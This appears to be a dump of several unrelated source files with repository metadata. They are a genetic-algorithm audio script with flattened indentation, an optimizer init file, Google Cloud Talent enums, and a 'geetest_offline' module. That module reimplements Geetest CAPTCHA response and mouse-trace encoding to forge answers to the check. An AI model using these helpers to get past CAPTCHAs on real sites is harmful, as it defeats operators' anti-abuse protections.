# print i_length, ' | ', i1_length, ' | ', zr0_length
# based on length comparison, resample the mutated individuals so that they are same length as the zeroth individual (that does not mutate)
# if indiv. is longer, resample indiv., take abs. diff., sum, div. by length
if zr0_length < i_length:
zero_dist = float(np.sum(np.abs(scipy.signal.signaltools.resample(self.rawmaps[index], zr0_length, window='hanning') - self.rawmaps[0]))) / float(zr0_length)
# print self.dists[index]
# if zeroth indiv. is longer, resample zeroth indiv., take abs. diff., sum, div. by length, then do same comparison with "neighbor"
elif i_length < zr0_length:
zero_dist = float(np.sum(np.abs(self.rawmaps[index] - scipy.signal.signaltools.resample(self.rawmaps[0], float(i_length), window='hanning')))) / float(i_length)
else:
# otherwise, take abs. diff., sum, div. by length, then do same comparison with "neighbor"
# print 'ZERO'
zero_dist = float(np.sum(np.abs(self.rawmaps[index][:,1:] - self.rawmaps[0][:,1:]))) / float(zr0_length)
### CHECK THIS DISTANCE CALCULATION!!!!!!
power_dist = float(np.sqrt(np.sum(np.abs(self.rawmaps[index][:,0] - self.rawmaps[0][:,0])))) / float(zr0_length)
print (zero_dist, (power_dist * 10.0))
zero_dist += (power_dist * 10.0)
# if i1_length < i_length:
# neighbor_dist = float(np.sum(np.abs(scipy.signal.signaltools.resample(self.rawmaps[index-1], i_length, window='hanning') - self.rawmaps[index]))) / float(i_length)
# elif i_length < i1_length:
# neighbor_dist = float(np.sum(np.abs(self.rawmaps[index-1] - scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning')))) / float(i1_length)
# else:
# print 'ZERO-NEIGHBOR'
# neighbor_dist = float(np.sum(np.abs(self.rawmaps[index-1] - scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning')))) / float(i1_length)
# self.dists[index] = zero_dist + neighbor_dist
self.dists[index] = zero_dist
def compare_individual_chi_squared(self, index):
i_length = self.rawmaps[index].shape[0]
i1_length = self.rawmaps[index-1].shape[0]
zr0_length = self.rawmaps[0].shape[0]
# print i_length, '|', zr0_length
# based on length comparison, resample the mutated individuals so that they are same length as the zeroth individual (that does not mutate)
# if indiv. is longer, resample indiv., take abs. diff., sum, div. by length
if zr0_length < i_length:
zero_dist = scipy.stats.mstats.chisquare(scipy.signal.signaltools.resample(self.rawmaps[index], zr0_length, window='hanning'), self.rawmaps[0])
# print self.dists[index]
# if zeroth indiv. is longer, resample zeroth indiv., take abs. diff., sum, div. by length, then do same comparison with "neighbor"
elif i_length < zr0_length:
zero_dist = scipy.stats.mstats.chisquare(self.rawmaps[index], scipy.signal.signaltools.resample(self.rawmaps[0], i_length, window='hanning'))
else:
# otherwise, take abs. diff., sum, div. by length, then do same comparison with "neighbor"
print 'CHI-ZERO'
zero_dist = scipy.stats.mstats.chisquare(self.rawmaps[index], self.rawmaps[0])
if i1_length < i_length:
neighbor_dist = scipy.stats.mstats.chisquare(scipy.signal.signaltools.resample(self.rawmaps[index-1], i_length, window='hanning') - self.rawmaps[index])
elif i_length < i1_length:
neighbor_dist = scipy.stats.mstats.chisquare(self.rawmaps[index-1], scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning'))
else:
print 'CHI-NEIGHBOR'
neighbor_dist = scipy.stats.mstats.chisquare(self.rawmaps[index-1], scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning'))
nsum = np.sum(np.abs(neighbor_dist[0].data[:24]))
zsum = np.sum(np.abs(zero_dist[0].data[:24]))
nasum = neighbor_dist[0].data[24]
zasum = zero_dist[0].data[24]
self.dists[index] = nsum + zsum - (24.0 * nasum) - (24.0 * zasum)
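# Hedged usage sketch (not part of the original script): the anchor directory
# and sound file names are placeholder assumptions, and analysis/rendering also
# requires scsynth and sox to be available on the PATH.
def _example_evolve(anchor='/path/to/project'):
    explorer = GenomicExplorer(anchor, ['source_a.wav', 'source_b.wav'], size=20, kdepth=10)
    explorer.iterate(iters=100)        # mutate, mate and re-rank the population
    explorer.print_all_individuals()   # inspect the surviving genomes
    explorer.render_individual(1)      # bounce one individual to snd/out/1.wav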
class Genome:
def __init__(self, values=None, slotranges=[[1.0,0.5],[0.0,0.05],[1.0, 0.5],[1.0,10.],[1.0,0.5],[0.0,50.]]):
# """
# 'alpha', 'c_delay', 'beta', 'd_mult', 'gamma', 'ms_bins'
# [[1.0,0.5],[0.0,0.05],[1.0,0.5],[1.0,10.],[1.0,0.5],[0.0,50.]]
# """
self.tratio = 1.0 # CHECK THIS... WHY IS IT HERE/in Hertz!!! ???
self.boundaries = slotranges
self.generators = [RandomGenerator_8Bit(-1) for n in range(6)] ### CONSTANT WARNING
#StaticGenerator_8Bit(VAL) ???
if values is None:
print 'values is None, generators are seeded randomly!'
self.values = [gen.val for gen in self.generators]
else:
self.values = values
self.bitlength = len(self.values) * 8
self.binarystring = vals_to_binarystring(self.values)
# print self.values
# print type(self.values[0])
self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
self.age = 0
self.edits = 0
def __repr__(self):
print tuple(self.values)
print ((self.age, self.edits) + tuple(self.values) + tuple(self.binarystring))
return "%9i/%9i || %.6f|%.6f|%.6f|%.6f|%.6f|%.6f" % ((self.age, self.edits) + tuple(self.realvalues)) # + tuple(self.binarystring)
def mutate(self):
pos = random.randint(0,(self.bitlength-1))
# flip bit
print 'bit flipped to: ', abs(1 - int(self.binarystring[pos],2))
self.binarystring = substitute_char_in_string(self.binarystring, pos, abs(1 - int(self.binarystring[pos],2)))
# recalc binary string
self.values = binarystring_to_vals(self.binarystring)
print "values: ", self.values
self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
# def xover_sub(self, pos, incomingSeq, headortail=0):
# if headortail == 0:
# print '<<>> ', self.binarystring
# print '<<>> ', pos
# print '<<>> ', incomingSeq
# self.binarystring = incomingSeq[:pos] + self.binarystring[pos:]
# else:
# print '<<>> ', self.binarystring
# print '<<>> ', pos
# print '<<>> ', incomingSeq
# self.binarystring = self.binarystring[:pos] + incomingSeq[:(len(self.binarystring)-pos)]
# # recalc binary string
# print '==== ', self.binarystring
# self.values = binarystring_to_vals(self.binarystring)
# print "values: ", self.values
# self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
def lininterp(val,bounds=[0.,1.]):
return (((val/128.0)*(bounds[1]-bounds[0]))+bounds[0])
def substitute_char_in_string(s, p, c):
l = list(s)
l[p] = str(c)
return "".join(l)
# def substitute_string_head(s, p, snew):
# s1 = snew[:]
# print '++++ ', s1
# s2 = s[p:]
# print '++++ ', s2
# return (s1 + s2)[:len(s)]
#
# def substitute_string_tail(s, p, snew):
# s1 = s[:p]
# print '==== ', s1
# print len(s)
# print p
# s2 = snew[:(len(s)-p)]
# print '==== ', s2
# return (s1 + s2)[:len(s)]
def vals_to_binarystring(vals = [0, 0, 0, 0, 0]):
return ''.join((("{0:08b}".format(val)) for val in vals))
# never a '0bXXX' string!
def binarystring_to_vals(binstring):
mystring = binstring[:]
length = len(mystring) / 8 # ignore the last digits if it doesn't chunk into 8-item substrings
res = []
# print mystring[(n*8):((n+1)*8)]
return [int(mystring[(n*8):((n+1)*8)], 2) for n in range(length)]
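# Hedged round-trip sketch (not in the original script): shows how the helpers
# above fit together -- six 8-bit genes become a 48-character bit string, and
# lininterp maps a gene back into the real-valued synth parameter ranges.
def _example_encoding_roundtrip():
    vals = [64, 3, 127, 10, 0, 99]                # six 8-bit genes
    bits = vals_to_binarystring(vals)             # 48-character '0'/'1' string
    assert binarystring_to_vals(bits) == vals     # decoding inverts encoding
    return lininterp(vals[0], [1.0, 0.5])         # first gene mapped into the alpha range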
# if __name__=='__main__':
# genex = GenomicExplorer('/Users/kfl/dev/python/sc-0.3.1/genomic', 'test.wav')
# genex.analyze_genome(1) | gpl-3.0 | 3,330,973,013,081,838,600 | 33.161616 | 235 | 0.644923 | false |
squillero/sgx | sgx/algorithms/__init__.py | 1 | 1569 | # -*- coding: utf-8 -*-
#############################################################################
# _________ ____________ ___ #
# / _____// _____/\ \/ / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# \_____ \/ \ ___ \ / THE E(X)TENDED (S)ELFISH (G)ENE ALGORITHM #
# / \ \_\ \/ \ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# /_________/\________/___/\ \ https://github.com/squillero/sgx #
# \_/ #
# #
# A quick 'n dirty versatile population-less evolutionary optimizer loosely #
# inspired by a cool interpretation of the Darwinian theory. #
# #
#############################################################################
# Copyright 2021 Giovanni Squillero
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .simple import *
| lgpl-3.0 | 7,524,890,428,544,134,000 | 53.103448 | 77 | 0.40854 | false |
9468305/script | geetest_offline/util.py | 1 | 3599 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
'''
Commonly used helper functions for geetest.
'''
SPLIT_ARRAY_JS = '''
function getSplitArray() {
for (var a, b = "6_11_7_10_4_12_3_1_0_5_2_9_8".split("_"), c = [], d = 0, e = 52; d < e; d++)
a = 2 * parseInt(b[parseInt(d % 26 / 2)]) + d % 2,
parseInt(d / 2) % 2 || (a += d % 2 ? -1 : 1),
a += d < 26 ? 26 : 0,
c.push(a);
return c
}
'''
USERRESPONSE_JS = '''
function userresponse(a, b) {
for (var c = b.slice(32), d = [], e = 0; e < c.length; e++) {
var f = c.charCodeAt(e);
d[e] = f > 57 ? f - 87 : f - 48
}
c = 36 * d[0] + d[1];
var g = Math.round(a) + c; b = b.slice(0, 32);
var h, i = [ [], [], [], [], [] ], j = {}, k = 0; e = 0;
for (var l = b.length; e < l; e++)
h = b.charAt(e), j[h] || (j[h] = 1, i[k].push(h), k++, k = 5 == k ? 0 : k);
for (var m, n = g, o = 4, p = "", q = [1, 2, 5, 10, 50]; n > 0;)
n - q[o] >= 0 ? (m = parseInt(Math.random() * i[o].length, 10), p += i[o][m], n -= q[o]) : (i.splice(o, 1), q.splice(o, 1), o -= 1);
return p
}
'''
OFFLINE_SAMPLE = ((186, 1, 98),
(82, 0, 136),
(61, 5, 108),
(128, 2, 7),
(130, 4, 99),
(189, 3, 65),
(108, 5, 285),
(136, 0, 36),
(41, 0, 263),
(124, 3, 185))
TRACE_JS = '''
var tracer = function () {
c = function (traceArray) {
for (var b, c, d, e = [], f = 0, g = [], h = 0, i = traceArray.length - 1; h < i; h++) {
b = Math.round(traceArray[h + 1][0] - traceArray[h][0]),
c = Math.round(traceArray[h + 1][1] - traceArray[h][1]),
d = Math.round(traceArray[h + 1][2] - traceArray[h][2]),
g.push([b, c, d]), 0 == b && 0 == c && 0 == d || (0 == b && 0 == c ? f += d : (e.push([b, c, d + f]), f = 0));
}
return 0 !== f && e.push([b, c, f]), e
},
d = function (a) {
var b = "()*,-./0123456789:?@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqr",
c = b.length,
d = "",
e = Math.abs(a),
f = parseInt(e / c);
f >= c && (f = c - 1), f && (d = b.charAt(f)), e %= c;
var g = "";
return a < 0 && (g += "!"), d && (g += "$"), g + d + b.charAt(e)
},
e = function (a) {
for (var b = [
[1, 0],
[2, 0],
[1, -1],
[1, 1],
[0, 1],
[0, -1],
[3, 0],
[2, -1],
[2, 1]
], c = "stuvwxyz~", d = 0, e = b.length; d < e; d++)
if (a[0] == b[d][0] && a[1] == b[d][1]) return c[d];
return 0
},
f = function (traceArray) {
for (var b, f = c(traceArray), g = [], h = [], i = [], j = 0, k = f.length; j < k; j++) {
b = e(f[j]), b ? h.push(b) : (g.push(d(f[j][0])), h.push(d(f[j][1]))), i.push(d(f[j][2]));
}
return g.join("") + "!!" + h.join("") + "!!" + i.join("")
},
g = function (traceArray) {
var a = f(traceArray);
return encodeURIComponent(a)
};
return {
trace: g
}
}();
exports.tracer = tracer;
'''
def has_key(database, key):
'''Safely check whether the key exists in the leveldb database.'''
try:
database.Get(key)
return True
except KeyError:
return False
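# Hedged usage sketch (not part of the original module): assumes the PyExecJS
# package and a JavaScript runtime are installed; the distance and challenge
# values are made up purely for illustration.
def example_userresponse(distance=50, challenge="34173cb38f07f89ddbebc2ac9128303fa1"):
    import execjs
    ctx = execjs.compile(USERRESPONSE_JS)
    # encode a slider distance against a geetest challenge string
    return ctx.call("userresponse", distance, challenge)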
| mit | -119,942,036,943,591,280 | 31.669811 | 144 | 0.35332 | false |
tseaver/google-cloud-python | talent/google/cloud/talent_v4beta1/gapic/enums.py | 1 | 48648 | # -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class AvailabilitySignalType(enum.IntEnum):
"""
The type of candidate availability signal.
Attributes:
AVAILABILITY_SIGNAL_TYPE_UNSPECIFIED (int): Default value.
JOB_APPLICATION (int): Job application signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent application. ``last_update_time``
is calculated from max(\ ``Application.create_time``) from all
``Application`` records where ``Application.source`` is any of the
following: ``APPLY_DIRECT_WEB`` ``APPLY_DIRECT_MOBILE_WEB``
``APPLY_DIRECT_MOBILE_APP`` ``APPLY_DIRECT_IN_PERSON``
``APPLY_INDIRECT``
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is JOB\_APPLICATION.
RESUME_UPDATE (int): Resume update signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent update to their resume. For a
``SummarizedProfile.summary``, ``last_update_time`` is calculated from
max(\ ``Profile.resume_update_time``) from all
``SummarizedProfile.profiles``.
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is RESUME\_UPDATE.
CANDIDATE_UPDATE (int): Candidate update signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent update to their profile. For a
``SummarizedProfile.summary``, ``last_update_time`` is calculated from
max(\ ``Profile.candidate_update_time``) from all
``SummarizedProfile.profiles``.
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is CANDIDATE\_UPDATE.
CLIENT_SUBMISSION (int): Client submission signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent submission. ``last_update_time``
is calculated from max(\ ``Application.create_time``) from all
``Application`` records where ``Application.stage`` is any of the
following: ``HIRING_MANAGER_REVIEW`` ``INTERVIEW`` ``OFFER_EXTENDED``
``OFFER_ACCEPTED`` ``STARTED``
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is CLIENT\_SUBMISSION.
"""
AVAILABILITY_SIGNAL_TYPE_UNSPECIFIED = 0
JOB_APPLICATION = 1
RESUME_UPDATE = 2
CANDIDATE_UPDATE = 3
CLIENT_SUBMISSION = 4
class CommuteMethod(enum.IntEnum):
"""
Method for commute.
Attributes:
COMMUTE_METHOD_UNSPECIFIED (int): Commute method isn't specified.
DRIVING (int): Commute time is calculated based on driving time.
TRANSIT (int): Commute time is calculated based on public transit including bus, metro,
subway, and so on.
WALKING (int): Commute time is calculated based on walking time.
CYCLING (int): Commute time is calculated based on biking time.
"""
COMMUTE_METHOD_UNSPECIFIED = 0
DRIVING = 1
TRANSIT = 2
WALKING = 3
CYCLING = 4
class CompanySize(enum.IntEnum):
"""
An enum that represents the size of the company.
Attributes:
COMPANY_SIZE_UNSPECIFIED (int): Default value if the size isn't specified.
MINI (int): The company has less than 50 employees.
SMALL (int): The company has between 50 and 99 employees.
SMEDIUM (int): The company has between 100 and 499 employees.
MEDIUM (int): The company has between 500 and 999 employees.
BIG (int): The company has between 1,000 and 4,999 employees.
BIGGER (int): The company has between 5,000 and 9,999 employees.
GIANT (int): The company has 10,000 or more employees.
"""
COMPANY_SIZE_UNSPECIFIED = 0
MINI = 1
SMALL = 2
SMEDIUM = 3
MEDIUM = 4
BIG = 5
BIGGER = 6
GIANT = 7
class ContactInfoUsage(enum.IntEnum):
"""
Enum that represents the usage of the contact information.
Attributes:
CONTACT_INFO_USAGE_UNSPECIFIED (int): Default value.
PERSONAL (int): Personal use.
WORK (int): Work use.
SCHOOL (int): School use.
"""
CONTACT_INFO_USAGE_UNSPECIFIED = 0
PERSONAL = 1
WORK = 2
SCHOOL = 3
class DegreeType(enum.IntEnum):
"""
Educational degree level defined in International Standard Classification
of Education (ISCED).
Attributes:
DEGREE_TYPE_UNSPECIFIED (int): Default value. Represents no degree, or early childhood education.
Maps to ISCED code 0.
Ex) Kindergarten
PRIMARY_EDUCATION (int): Primary education which is typically the first stage of compulsory
education. ISCED code 1.
Ex) Elementary school
LOWER_SECONDARY_EDUCATION (int): Lower secondary education; First stage of secondary education building on
primary education, typically with a more subject-oriented curriculum.
ISCED code 2.
Ex) Middle school
UPPER_SECONDARY_EDUCATION (int): Middle education; Second/final stage of secondary education preparing for
tertiary education and/or providing skills relevant to employment.
Usually with an increased range of subject options and streams. ISCED
code 3.
Ex) High school
ADULT_REMEDIAL_EDUCATION (int): Adult Remedial Education; Programmes providing learning experiences that
build on secondary education and prepare for labour market entry and/or
tertiary education. The content is broader than secondary but not as
complex as tertiary education. ISCED code 4.
ASSOCIATES_OR_EQUIVALENT (int): Associate's or equivalent; Short first tertiary programmes that are
typically practically-based, occupationally-specific and prepare for
labour market entry. These programmes may also provide a pathway to other
tertiary programmes. ISCED code 5.
BACHELORS_OR_EQUIVALENT (int): Bachelor's or equivalent; Programmes designed to provide intermediate
academic and/or professional knowledge, skills and competencies leading
to a first tertiary degree or equivalent qualification. ISCED code 6.
MASTERS_OR_EQUIVALENT (int): Master's or equivalent; Programmes designed to provide advanced academic
and/or professional knowledge, skills and competencies leading to a
second tertiary degree or equivalent qualification. ISCED code 7.
DOCTORAL_OR_EQUIVALENT (int): Doctoral or equivalent; Programmes designed primarily to lead to an
advanced research qualification, usually concluding with the submission
and defense of a substantive dissertation of publishable quality based on
original research. ISCED code 8.
"""
DEGREE_TYPE_UNSPECIFIED = 0
PRIMARY_EDUCATION = 1
LOWER_SECONDARY_EDUCATION = 2
UPPER_SECONDARY_EDUCATION = 3
ADULT_REMEDIAL_EDUCATION = 4
ASSOCIATES_OR_EQUIVALENT = 5
BACHELORS_OR_EQUIVALENT = 6
MASTERS_OR_EQUIVALENT = 7
DOCTORAL_OR_EQUIVALENT = 8
class EmploymentType(enum.IntEnum):
"""
An enum that represents the employment type of a job.
Attributes:
EMPLOYMENT_TYPE_UNSPECIFIED (int): The default value if the employment type isn't specified.
FULL_TIME (int): The job requires working a number of hours that constitute full
time employment, typically 40 or more hours per week.
PART_TIME (int): The job entails working fewer hours than a full time job,
typically less than 40 hours a week.
CONTRACTOR (int): The job is offered as a contracted, as opposed to a salaried employee,
position.
CONTRACT_TO_HIRE (int): The job is offered as a contracted position with the understanding that
it's converted into a full-time position at the end of the contract.
Jobs of this type are also returned by a search for
``EmploymentType.CONTRACTOR`` jobs.
TEMPORARY (int): The job is offered as a temporary employment opportunity, usually
a short-term engagement.
INTERN (int): The job is a fixed-term opportunity for students or entry-level job
seekers to obtain on-the-job training, typically offered as a summer
position.
VOLUNTEER (int): This is an opportunity for an individual to volunteer, where there's no
expectation of compensation for the provided services.
PER_DIEM (int): The job requires an employee to work on an as-needed basis with a
flexible schedule.
FLY_IN_FLY_OUT (int): The job involves employing people in remote areas and flying them
temporarily to the work site instead of relocating employees and their
families permanently.
OTHER_EMPLOYMENT_TYPE (int): The job does not fit any of the other listed types.
"""
EMPLOYMENT_TYPE_UNSPECIFIED = 0
FULL_TIME = 1
PART_TIME = 2
CONTRACTOR = 3
CONTRACT_TO_HIRE = 4
TEMPORARY = 5
INTERN = 6
VOLUNTEER = 7
PER_DIEM = 8
FLY_IN_FLY_OUT = 9
OTHER_EMPLOYMENT_TYPE = 10
class HtmlSanitization(enum.IntEnum):
"""
Option for HTML content sanitization on user input fields, for example, job
description. By setting this option, user can determine whether and how
sanitization is performed on these fields.
Attributes:
HTML_SANITIZATION_UNSPECIFIED (int): Default value.
HTML_SANITIZATION_DISABLED (int): Disables sanitization on HTML input.
SIMPLE_FORMATTING_ONLY (int): Sanitizes HTML input, only accepts bold, italic, ordered list, and
unordered list markup tags.
"""
HTML_SANITIZATION_UNSPECIFIED = 0
HTML_SANITIZATION_DISABLED = 1
SIMPLE_FORMATTING_ONLY = 2
class JobBenefit(enum.IntEnum):
"""
An enum that represents employee benefits included with the job.
Attributes:
JOB_BENEFIT_UNSPECIFIED (int): Default value if the type isn't specified.
CHILD_CARE (int): The job includes access to programs that support child care, such
as daycare.
DENTAL (int): The job includes dental services covered by a dental
insurance plan.
DOMESTIC_PARTNER (int): The job offers specific benefits to domestic partners.
FLEXIBLE_HOURS (int): The job allows for a flexible work schedule.
MEDICAL (int): The job includes health services covered by a medical insurance plan.
LIFE_INSURANCE (int): The job includes a life insurance plan provided by the employer or
available for purchase by the employee.
PARENTAL_LEAVE (int): The job allows for a leave of absence to a parent to care for a newborn
child.
RETIREMENT_PLAN (int): The job includes a workplace retirement plan provided by the
employer or available for purchase by the employee.
SICK_DAYS (int): The job allows for paid time off due to illness.
VACATION (int): The job includes paid time off for vacation.
VISION (int): The job includes vision services covered by a vision
insurance plan.
"""
JOB_BENEFIT_UNSPECIFIED = 0
CHILD_CARE = 1
DENTAL = 2
DOMESTIC_PARTNER = 3
FLEXIBLE_HOURS = 4
MEDICAL = 5
LIFE_INSURANCE = 6
PARENTAL_LEAVE = 7
RETIREMENT_PLAN = 8
SICK_DAYS = 9
VACATION = 10
VISION = 11
class JobCategory(enum.IntEnum):
"""
An enum that represents the categorization or primary focus of specific
role. This value is different than the "industry" associated with a role,
which is related to the categorization of the company listing the job.
Attributes:
JOB_CATEGORY_UNSPECIFIED (int): The default value if the category isn't specified.
ACCOUNTING_AND_FINANCE (int): An accounting and finance job, such as an Accountant.
ADMINISTRATIVE_AND_OFFICE (int): An administrative and office job, such as an Administrative Assistant.
ADVERTISING_AND_MARKETING (int): An advertising and marketing job, such as Marketing Manager.
ANIMAL_CARE (int): An animal care job, such as Veterinarian.
ART_FASHION_AND_DESIGN (int): An art, fashion, or design job, such as Designer.
BUSINESS_OPERATIONS (int): A business operations job, such as Business Operations Manager.
CLEANING_AND_FACILITIES (int): A cleaning and facilities job, such as Custodial Staff.
COMPUTER_AND_IT (int): A computer and IT job, such as Systems Administrator.
CONSTRUCTION (int): A construction job, such as General Laborer.
CUSTOMER_SERVICE (int): A customer service job, such as Cashier.
EDUCATION (int): An education job, such as School Teacher.
ENTERTAINMENT_AND_TRAVEL (int): An entertainment and travel job, such as Flight Attendant.
FARMING_AND_OUTDOORS (int): A farming or outdoor job, such as Park Ranger.
HEALTHCARE (int): A healthcare job, such as Registered Nurse.
HUMAN_RESOURCES (int): A human resources job, such as Human Resources Director.
INSTALLATION_MAINTENANCE_AND_REPAIR (int): An installation, maintenance, or repair job, such as Electrician.
LEGAL (int): A legal job, such as Law Clerk.
MANAGEMENT (int): A management job, often used in conjunction with another category,
such as Store Manager.
MANUFACTURING_AND_WAREHOUSE (int): A manufacturing or warehouse job, such as Assembly Technician.
MEDIA_COMMUNICATIONS_AND_WRITING (int): A media, communications, or writing job, such as Media Relations.
OIL_GAS_AND_MINING (int): An oil, gas or mining job, such as Offshore Driller.
PERSONAL_CARE_AND_SERVICES (int): A personal care and services job, such as Hair Stylist.
PROTECTIVE_SERVICES (int): A protective services job, such as Security Guard.
REAL_ESTATE (int): A real estate job, such as Buyer's Agent.
RESTAURANT_AND_HOSPITALITY (int): A restaurant and hospitality job, such as Restaurant Server.
SALES_AND_RETAIL (int): A sales and/or retail job, such Sales Associate.
SCIENCE_AND_ENGINEERING (int): A science and engineering job, such as Lab Technician.
SOCIAL_SERVICES_AND_NON_PROFIT (int): A social services or non-profit job, such as Case Worker.
SPORTS_FITNESS_AND_RECREATION (int): A sports, fitness, or recreation job, such as Personal Trainer.
TRANSPORTATION_AND_LOGISTICS (int): A transportation or logistics job, such as Truck Driver.
"""
JOB_CATEGORY_UNSPECIFIED = 0
ACCOUNTING_AND_FINANCE = 1
ADMINISTRATIVE_AND_OFFICE = 2
ADVERTISING_AND_MARKETING = 3
ANIMAL_CARE = 4
ART_FASHION_AND_DESIGN = 5
BUSINESS_OPERATIONS = 6
CLEANING_AND_FACILITIES = 7
COMPUTER_AND_IT = 8
CONSTRUCTION = 9
CUSTOMER_SERVICE = 10
EDUCATION = 11
ENTERTAINMENT_AND_TRAVEL = 12
FARMING_AND_OUTDOORS = 13
HEALTHCARE = 14
HUMAN_RESOURCES = 15
INSTALLATION_MAINTENANCE_AND_REPAIR = 16
LEGAL = 17
MANAGEMENT = 18
MANUFACTURING_AND_WAREHOUSE = 19
MEDIA_COMMUNICATIONS_AND_WRITING = 20
OIL_GAS_AND_MINING = 21
PERSONAL_CARE_AND_SERVICES = 22
PROTECTIVE_SERVICES = 23
REAL_ESTATE = 24
RESTAURANT_AND_HOSPITALITY = 25
SALES_AND_RETAIL = 26
SCIENCE_AND_ENGINEERING = 27
SOCIAL_SERVICES_AND_NON_PROFIT = 28
SPORTS_FITNESS_AND_RECREATION = 29
TRANSPORTATION_AND_LOGISTICS = 30
class JobLevel(enum.IntEnum):
"""
An enum that represents the required experience level required for the job.
Attributes:
JOB_LEVEL_UNSPECIFIED (int): The default value if the level isn't specified.
ENTRY_LEVEL (int): Entry-level individual contributors, typically with less than 2 years of
experience in a similar role. Includes interns.
EXPERIENCED (int): Experienced individual contributors, typically with 2+ years of
experience in a similar role.
MANAGER (int): Entry- to mid-level managers responsible for managing a team of people.
DIRECTOR (int): Senior-level managers responsible for managing teams of managers.
EXECUTIVE (int): Executive-level managers and above, including C-level positions.
"""
JOB_LEVEL_UNSPECIFIED = 0
ENTRY_LEVEL = 1
EXPERIENCED = 2
MANAGER = 3
DIRECTOR = 4
EXECUTIVE = 5
class JobView(enum.IntEnum):
"""
An enum that specifies the job attributes that are returned in the
``MatchingJob.job`` or ``ListJobsResponse.jobs`` fields.
Attributes:
JOB_VIEW_UNSPECIFIED (int): Default value.
JOB_VIEW_ID_ONLY (int): An ID-only view of the job, with the following attributes: ``Job.name``,
``Job.requisition_id``, ``Job.language_code``.
JOB_VIEW_MINIMAL (int): A minimal view of the job, with the following attributes: ``Job.name``,
``Job.requisition_id``, ``Job.title``, ``Job.company``,
``Job.DerivedInfo.locations``, ``Job.language_code``.
JOB_VIEW_SMALL (int): A small view of the job, with the following attributes in the search
results: ``Job.name``, ``Job.requisition_id``, ``Job.title``,
``Job.company``, ``Job.DerivedInfo.locations``, ``Job.visibility``,
``Job.language_code``, ``Job.description``.
JOB_VIEW_FULL (int): All available attributes are included in the search results.
"""
JOB_VIEW_UNSPECIFIED = 0
JOB_VIEW_ID_ONLY = 1
JOB_VIEW_MINIMAL = 2
JOB_VIEW_SMALL = 3
JOB_VIEW_FULL = 4
class Outcome(enum.IntEnum):
"""
The overall outcome /decision / result indicator.
Attributes:
OUTCOME_UNSPECIFIED (int): Default value.
POSITIVE (int): A positive outcome / passing indicator (for example, candidate was
recommended for hiring or to be moved forward in the hiring process,
candidate passed a test).
NEUTRAL (int): A neutral outcome / no clear indicator (for example, no strong
recommendation either to move forward / not move forward, neutral score).
NEGATIVE (int): A negative outcome / failing indicator (for example, candidate was
recommended to NOT move forward in the hiring process, failed a test).
OUTCOME_NOT_AVAILABLE (int): The assessment outcome is not available or otherwise unknown (for example,
candidate did not complete assessment).
"""
OUTCOME_UNSPECIFIED = 0
POSITIVE = 1
NEUTRAL = 2
NEGATIVE = 3
OUTCOME_NOT_AVAILABLE = 4
class PostingRegion(enum.IntEnum):
"""
An enum that represents the job posting region. In most cases, job postings
don't need to specify a region. If a region is given, jobs are
eligible for searches in the specified region.
Attributes:
POSTING_REGION_UNSPECIFIED (int): If the region is unspecified, the job is only returned if it matches the
``LocationFilter``.
ADMINISTRATIVE_AREA (int): In addition to exact location matching, job posting is returned when the
``LocationFilter`` in the search query is in the same administrative
area as the returned job posting. For example, if a
``ADMINISTRATIVE_AREA`` job is posted in "CA, USA", it's returned if
``LocationFilter`` has "Mountain View".
Administrative area refers to top-level administrative subdivision of
this country. For example, US state, IT region, UK constituent nation
and JP prefecture.
NATION (int): In addition to exact location matching, job is returned when
``LocationFilter`` in search query is in the same country as this job.
For example, if a ``NATION_WIDE`` job is posted in "USA", it's returned
if ``LocationFilter`` has 'Mountain View'.
TELECOMMUTE (int): Job allows employees to work remotely (telecommute).
If locations are provided with this value, the job is
considered as having a location, but telecommuting is allowed.
"""
POSTING_REGION_UNSPECIFIED = 0
ADMINISTRATIVE_AREA = 1
NATION = 2
TELECOMMUTE = 3
class SkillProficiencyLevel(enum.IntEnum):
"""
Enum that represents the skill proficiency level.
Attributes:
SKILL_PROFICIENCY_LEVEL_UNSPECIFIED (int): Default value.
UNSKILLED (int): Lacks any proficiency in this skill.
FUNDAMENTAL_AWARENESS (int): Have a common knowledge or an understanding of basic techniques and
concepts.
NOVICE (int): Have the level of experience gained in a classroom and/or experimental
scenarios or as a trainee on-the-job.
INTERMEDIATE (int): Be able to successfully complete tasks in this skill as requested. Help
from an expert may be required from time to time, but can usually perform
skill independently.
